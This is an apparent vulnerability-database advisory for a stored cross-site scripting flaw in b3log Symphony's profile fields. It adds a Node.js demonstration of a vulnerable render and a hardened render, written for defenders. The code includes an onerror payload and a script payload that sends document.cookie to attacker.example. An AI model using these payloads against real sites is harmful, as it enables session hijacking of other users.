VYPR
Moderate severity · GHSA Advisory · Published Feb 25, 2019 · Updated Sep 16, 2024

CVE-2019-9142

Description

Symphony v3.4.7 and earlier suffer from stored XSS via the userIntro and userNickname fields in SettingsProcessor.java.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The b3log Symphony (aka Sym) application, version 3.4.7 and earlier, contains a stored cross-site scripting (XSS) vulnerability in processor/SettingsProcessor.java. The userIntro and userNickname values submitted through the settings form are persisted without sanitization and later rendered into pages without output encoding, so any HTML or JavaScript placed in them is interpreted by the browser of every user who views those pages [1][2]. Note the version discrepancy on this page: the CVE description gives the affected range as 3.4.7 and earlier, while the GitHub Security Advisory lists versions before 3.4.7 as affected and 3.4.7 as the patched release.

Exploitation

Exploitation requires the ability to write to the affected profile fields: normally an authenticated user editing their own settings, or an administrator updating the user's description on their behalf. The attacker submits a payload such as an HTML element carrying a JavaScript event handler, or a script tag, in the userIntro or userNickname field through the normal web interface. No special network position is needed; an ordinary account on the instance is sufficient.

Impact

Successful exploitation runs attacker-supplied JavaScript in the browser of any user who views a page that renders the attacker's stored profile fields (for example the user list or the profile page itself), within that user's session. Typical consequences are session hijacking through cookie or token theft, actions performed with the victim's privileges, defacement and redirection to attacker-controlled sites. Because the payload is stored server-side, it fires on every view until the field is cleaned up, and an administrator viewing the profile is as exposed as any other user.

Mitigation

The GitHub Security Advisory lists 3.4.7 as the patched release, so deployments on earlier versions should upgrade to at least v3.4.7 [1][2]. Since the CVE description names 3.4.7 itself as affected, verify after upgrading that markup entered into userIntro and userNickname is rendered encoded rather than relying on the version number alone. Where upgrading is not immediately possible, restrict who can edit profile fields and consider adding your own controls: contextual output encoding of userIntro and userNickname wherever they are rendered is the control that actually closes a stored XSS, with input validation (for instance rejecting markup in a nickname) as defence in depth. The page records no official workaround.
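The following is an added example, not Symphony's code or the project's patch. It is a minimal Node.js stand-in for the "settings form, persisted user record, rendered profile" path described in the Vulnerability, Exploitation and Mitigation sections above: the same two field names, a constructed payload for each, a vulnerable render next to a hardened one, plus the two checks a practitioner would want when assessing an instance (does attacker markup survive verbatim into the page, and does a nickname policy reject it). The store, payloads, render templates and nickname policy are all this example's assumptions.

```javascript
// Added example (not Symphony's code): a minimal stand-in for a
// "settings form -> persisted user record -> rendered profile" path, used to
// show how stored XSS in fields like userIntro / userNickname arises and how
// output encoding and input validation close it. Field names match the
// advisory; the store, render functions and payloads are constructed here.

// Constructed attacker input for the two affected fields.
const PAYLOAD_NICKNAME = '<img src=x onerror=alert(1)>';
const PAYLOAD_INTRO =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// In-memory stand-in for the database row. In a stored XSS the payload lives
// here and is served to every viewer until the row is cleaned up.
const userStore = new Map();

function saveSettings(userId, { userNickname, userIntro }) {
  // Stores raw values, as a vulnerable settings handler does. Storing raw is
  // only safe if every render site encodes; the bug is the missing encoding.
  userStore.set(userId, { userNickname, userIntro });
}

// HTML text/attribute encoding of the characters that can change parsing
// context. Use a maintained library in production; this is the minimal form.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Defence in depth for the nickname: a display name never needs markup, so
// reject anything outside letters, digits, underscore and hyphen (1-20 chars).
// The policy itself is this example's assumption, not Symphony's.
function isValidNickname(nick) {
  return /^[\p{L}\p{N}_-]{1,20}$/u.test(nick);
}

// Vulnerable render: stored values concatenated straight into HTML.
function renderProfileVulnerable(userId) {
  const u = userStore.get(userId);
  return `<div class="profile"><h2>${u.userNickname}</h2><p>${u.userIntro}</p></div>`;
}

// Hardened render: same template, values encoded at the point of output.
function renderProfileHardened(userId) {
  const u = userStore.get(userId);
  return `<div class="profile"><h2>${escapeHtml(u.userNickname)}</h2>` +
         `<p>${escapeHtml(u.userIntro)}</p></div>`;
}

// Server-side smoke test: does an input that contains a tag survive verbatim
// into the rendered page? A real browser test would watch for execution
// instead; this catches the missing-encoding case without a browser.
function leaksMarkup(html, input) {
  return /<[a-z]/i.test(input) && html.includes(input);
}

function demo() {
  saveSettings('attacker', { userNickname: PAYLOAD_NICKNAME, userIntro: PAYLOAD_INTRO });
  const vulnerableHtml = renderProfileVulnerable('attacker');
  const hardenedHtml = renderProfileHardened('attacker');
  return {
    vulnerableLeaks: leaksMarkup(vulnerableHtml, PAYLOAD_NICKNAME) || leaksMarkup(vulnerableHtml, PAYLOAD_INTRO),
    hardenedLeaks: leaksMarkup(hardenedHtml, PAYLOAD_NICKNAME) || leaksMarkup(hardenedHtml, PAYLOAD_INTRO),
    nicknameRejected: !isValidNickname(PAYLOAD_NICKNAME),
    hardenedHtml,
  };
}

console.log(demo());
```

Run it with `node` and compare the two render paths: the vulnerable one returns the payload byte-for-byte inside the `<h2>` and `<p>` elements, while the hardened one returns `&lt;img src=x onerror=alert(1)&gt;` and an encoded script tag that the browser displays as text. The `leaksMarkup` check is the same test to apply against a live instance after upgrading: save a harmless tag in both fields, fetch the profile page and confirm the tag comes back encoded.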

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package              Ecosystem   Affected versions   Patched versions
org.b3log:symphony   Maven       < 3.4.7             3.4.7
